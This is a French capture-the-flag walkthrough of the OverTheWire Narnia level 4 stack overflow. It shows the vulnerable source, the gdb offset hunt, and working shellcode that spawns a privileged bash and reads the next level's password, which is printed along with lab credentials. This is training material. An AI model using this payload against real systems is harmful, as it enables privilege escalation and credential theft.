



Level 4

ssh narnia4@narnia.labs.overthewire.org
pass : thaenohtai
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
 
extern char **environ;
 
/*
 * Entry point of the narnia4 challenge binary.
 *
 * As written: every string reachable through environ[] is overwritten
 * with '\0' bytes, then argv[1] (when present) is copied into a
 * fixed-size stack buffer with strcpy(). Always returns 0.
 *
 * NOTE(review): strcpy() does not bound the copy — an argv[1] longer
 * than 255 bytes overruns buffer[256] and whatever lies beyond it on
 * the stack. That unchecked copy is the memory-safety defect of this
 * program; a bounded copy such as
 * snprintf(buffer, sizeof buffer, "%s", argv[1]) would close it.
 */
int main(int argc,char **argv){
	int i;
	char buffer[256];	/* uninitialised; only ever written by the copy below */
 
	/* Zero the contents of each environment string in place. The
	 * environ[i] pointers are left untouched, so the variables still
	 * exist — only their bytes are wiped. strlen() stops at the first
	 * NUL, so each string is cleared exactly up to its terminator. */
	for(i = 0; environ[i] != NULL; i++)
		memset(environ[i], '\0', strlen(environ[i]));
 
	/* Unbounded copy of the untrusted argv[1] into a 256-byte stack
	 * buffer; no length check precedes it. */
	if(argc>1)
		strcpy(buffer,argv[1]);
 
	return 0;
}

Buffer overflow classique sur la pile ; si vous avez l'habitude d'utiliser les variables d'environnement pour y placer votre shellcode, cela ne va pas être possible ici : elles sont toutes écrasées par des octets nuls avant la copie ! On va donc mettre directement notre shellcode dans buffer et sauter dessus :)

gdb$ r $(python -c 'print "\xcc"*272+"BBBB"')
 
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
  EAX: 00000000  EBX: F7FD2FF4  ECX: 00000000  EDX: FFFFD919  o d I t s Z a P c 
  ESI: 00000000  EDI: 00000000  EBP: CCCCCCCC  ESP: FFFFD620  EIP: 42424242
  CS: 0023  DS: 002B  ES: 002B  FS: 0000  GS: 0063  SS: 002BError while running hook_stop:
Cannot access memory at address 0x42424242
0x42424242 in ?? ()
gdb$ x/200x $esp
0xffffd620:	0x00000000	0xffffd6c4	0xffffd6d0	0xf7fdf420
0xffffd630:	0xffffffff	0xf7ffcff4	0x0804827a	0x00000001
0xffffd640:	0xffffd680	0xf7fedd61	0xf7ffdad0	0xf7fd72e8
0xffffd650:	0x00000001	0xf7fd2ff4	0x00000000	0x00000000
0xffffd660:	0xffffd698	0x5326f6a1	0x7db14eb1	0x00000000
0xffffd670:	0x00000000	0x00000000	0x00000002	0x080483a0
0xffffd680:	0x00000000	0xf7ff3f70	0xf7e89d5b	0xf7ffcff4
0xffffd690:	0x00000002	0x080483a0	0x00000000	0x080483c1
0xffffd6a0:	0x08048454	0x00000002	0xffffd6c4	0x08048500
0xffffd6b0:	0x08048560	0xf7feed80	0xffffd6bc	0xf7ffd918
0xffffd6c0:	0x00000002	0xffffd7f4	0xffffd804	0x00000000
0xffffd6d0:	0xffffd919	0xffffd929	0xffffd93d	0xffffd95e
0xffffd6e0:	0xffffd971	0xffffd984	0xffffd991	0xffffde81
0xffffd6f0:	0xffffde8c	0xffffde98	0xffffdee5	0xffffdefc
0xffffd700:	0xffffdf0b	0xffffdf17	0xffffdf28	0xffffdf31
0xffffd710:	0xffffdf44	0xffffdf4c	0xffffdf5c	0xffffdf71
0xffffd720:	0xffffdfa6	0xffffdfc6	0x00000000	0x00000020
0xffffd730:	0xf7fdf420	0x00000021	0xf7fdf000	0x00000010
0xffffd740:	0x17898175	0x00000006	0x00001000	0x00000011
0xffffd750:	0x00000064	0x00000003	0x08048034	0x00000004
0xffffd760:	0x00000020	0x00000005	0x00000007	0x00000007
0xffffd770:	0xf7fe0000	0x00000008	0x00000000	0x00000009
0xffffd780:	0x080483a0	0x0000000b	0x000036b4	0x0000000c
0xffffd790:	0x000036b4	0x0000000d	0x000036b4	0x0000000e
0xffffd7a0:	0x000036b4	0x00000017	0x00000000	0x00000019
0xffffd7b0:	0xffffd7db	0x0000001f	0xffffdfe8	0x0000000f
0xffffd7c0:	0xffffd7eb	0x00000000	0x00000000	0x00000000
0xffffd7d0:	0x00000000	0x00000000	0x08000000	0x5b4ce26c
0xffffd7e0:	0x85af5645	0x503435d7	0x69632138	0x00363836
0xffffd7f0:	0x00000000	0x706d742f	0x2f346e2f	0x6e72616e
0xffffd800:	0x00346169	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd810:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd820:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd830:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd840:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd850:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd860:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd870:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd880:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd890:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd8a0:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd8b0:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd8c0:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd8d0:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd8e0:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd8f0:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd900:	0xcccccccc	0xcccccccc	0xcccccccc	0xcccccccc
0xffffd910:	0xcccccccc	0x42424242	0x00000000	0x00000000

Nous pouvons donc par exemple sauter à l'adresse 0xffffd830, qui tombe au milieu de la zone de buffer remplie de 0xcc ci-dessus.

narnia4@melissa:/tmp/n4$ ./narnia4 $(python -c 'print "\x90"*239+"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"+"\x30\xd8\xff\xff"')
bash-4.2$ id
uid=14004(narnia4) gid=14004(narnia4) euid=14005(narnia5) groups=14005(narnia5),14004(narnia4)
bash-4.2$ cat /etc/narnia_pass/narnia5
faimahchiy